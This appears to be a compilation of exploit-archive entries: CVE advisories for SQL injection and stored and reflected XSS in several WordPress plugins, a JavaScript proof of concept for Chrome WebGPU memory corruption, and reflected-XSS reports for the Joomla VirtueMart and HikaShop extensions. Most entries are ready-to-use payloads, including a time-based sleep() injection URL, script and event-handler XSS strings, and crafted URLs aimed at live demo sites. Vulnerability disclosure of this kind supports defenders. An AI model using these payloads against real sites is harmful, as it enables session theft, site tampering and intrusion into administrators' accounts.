<pre><code>Title:<br />WordPress Plugin WP Brutal AI < 2.0.0 - SQL Injection via CSRF<br /><br />References:<br />CVE-2023-2601<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.<br /><br />Affects Plugins:<br />WP Brutal AI - Fixed in version 2.0.0<br /><br />Proof of Concept:<br /><br />When there is a created campaign, access the following link as an admin:<br /><br />https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1+and+sleep%2815%29 <br /><br />Classification:<br />Type SQLi <br />OWASP top 10 A1: SQL Injection (SQLi)<br />CWE-89<br /><br />wpScan:<br />https://wpscan.com/vulnerability/57769468-3802-4985-bf5e-44ec1d59f5fd<br /></code></pre>
<pre><code>Title:<br />WordPress Plugin SEO ALert <= 1.59 - Admin+ Stored XSS<br /><br /><br />References:<br />CVE-2023-2225<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).<br /><br />Affects Plugins:<br />SEO ALert - No known fix - plugin closed<br /><br />Proof of Concept:<br /><br />1. Go to Vanilla Beans » SEO Alert.<br /> <br />2. In "Slack Alert for" » "Slack Channel" add payload: "><audio src=x onerror=confirm("XSS")><br /> <br />3. Save to get the XSS trigger. <br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/0af475ba-5c02-4f62-876d-6235a745bbd6<br /></code></pre>
<pre><code>Title:<br />WordPress Plugin PrePost SEO <= 3.0 - Admin + Stored Cross-Site Scripting<br /><br /><br />References:<br />CVE-2023-2029<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting (XSS) attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).<br /><br />Affects Plugins:<br />PrePost SEO - No known fix - plugin closed<br /><br />Proof of Concept:<br /><br />1. Add XSS payload to plugin's "Account API key" setting: "><iframe src="<svg onload=alert(4);>"><br /><br />2. Save and see XSS exploit. <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/4889ad5a-c8c4-4958-b176-64560490497b<br /></code></pre>
<pre><code>Title:<br />WordPress Plugin Tablesome < 1.0.9 - Reflected XSS<br /><br />References:<br />CVE-2023-1890<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not escape various generated URLs before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting.<br /><br />Affects Plugins:<br />Tablesome - Fixed in version 1.0.9<br /><br />Proof of Concept:<br />Make a logged-in admin open one of the URLs below when the feature/tracking notice has not been dismissed yet:<br /><br />https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E<br />https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script><br />https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script> <br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d<br /></code></pre>
<pre><code>Title:<br />WordPress Plugin Login Rebuilder < 2.8.1 - Admin+ Stored XSS<br /><br /><br />References:<br />CVE-2023-2223<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).<br /><br />Affects Plugins:<br />Login Rebuilder - Fixed in version 2.8.1<br /><br />Proof of Concept:<br /><br />1. Go to Settings » Login rebuilder<br /> <br />2. In Login file keyword, add payload: "><iframe src="<svg onload=alert(4);>"><br /> <br />3. Save the changes to trigger XSS. <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/7b356b82-5d03-4f70-b4ce-f1405304bb52<br /></code></pre>
<pre><code>Title:<br />WordPress Plugin Seo By 10Web < 2.8.1 - Admin+ Stored XSS<br /><br /><br />References:<br />CVE-2023-2224<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).<br /><br />Affects Plugins:<br />Seo By 10Web - Fixed in version 1.2.7<br /><br />Proof of Concept:<br /><br />1. Go to SEO by 10Web » Sitemap section.<br /><br />2. Add a new URL to the page.<br /><br />3. Add XSS payload: "><audio src=x onerror=confirm("XSS")><br /><br />4. Save to trigger the XSS. <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992<br /></code></pre>
<pre><code>Title:<br />WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site Scripting<br /><br />References:<br />CVE-2023-1893<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.<br /><br />Affects Plugins:<br />Login Configurator - No known fix - plugin closed<br /><br />Proof of Concept:<br /><br />Visit the following path:<br /><br />/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top <br /><br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7<br /></code></pre>
<pre><code><script><br />/*<br />Google Chrome WebGPU Memory Corruption<br />Author: Jean Pereira <pereira.one.010@gmail.com><br />Released: 2023/06/25<br />Vendor: https://www.google.com<br />Software: https://www.google.com/chrome/<br />Tested with version: 115.0.5790.102 (latest version)<br />*/<br /><br />navigator.gpu.requestAdapter().then(a => {<br /> a.requestDevice().then(d => {<br /> const b = d.createBuffer({<br /> mappedAtCreation: true,<br /> size: 0x1000,<br /> usage: GPUBufferUsage.MAP_WRITE,<br /> })<br /><br /> function asm(s, a, b) {<br /> 'use asm'<br /> var arr = new s.Uint32Array(b)<br /><br /> function nop(x) {<br /> x = x | 0<br /> }<br /> return nop<br /> }<br /><br /> asm({<br /> Uint32Array: Uint32Array<br /> }, {}, b.getMappedRange())<br /><br /> b.destroy()<br /> })<br />})<br /></script><br /></code></pre>
<pre><code># Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 24/07/2023<br /># Vendor: VirtueMart Team<br /># Vendor Homepage: https://www.virtuemart.net/<br /># Software Link: https://demo.virtuemart.net/<br /># Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /product-variants<br /><br />GET parameter 'keyword' is vulnerable to RXSS<br /><br />https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925<br /><br /><br />[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 24/07/2023<br /># Vendor: Hikari Software Team<br /># Vendor Homepage: https://www.hikashop.com/<br /># Software Link: https://demo.hikashop.com/index.php/en/<br /># Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_option' is vulnerable to RXSS<br /><br />https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103<br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_ctrl' is vulnerable to RXSS<br /><br />https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103<br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_task' is vulnerable to RXSS<br /><br />https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103<br /><br /><br />Path: /index.php<br /><br />GET parameter 'from_itemid' is vulnerable to RXSS<br /><br />https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]<br /><br /><br />[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46<br /><br /><br /><br />[-] Done<br /></code></pre>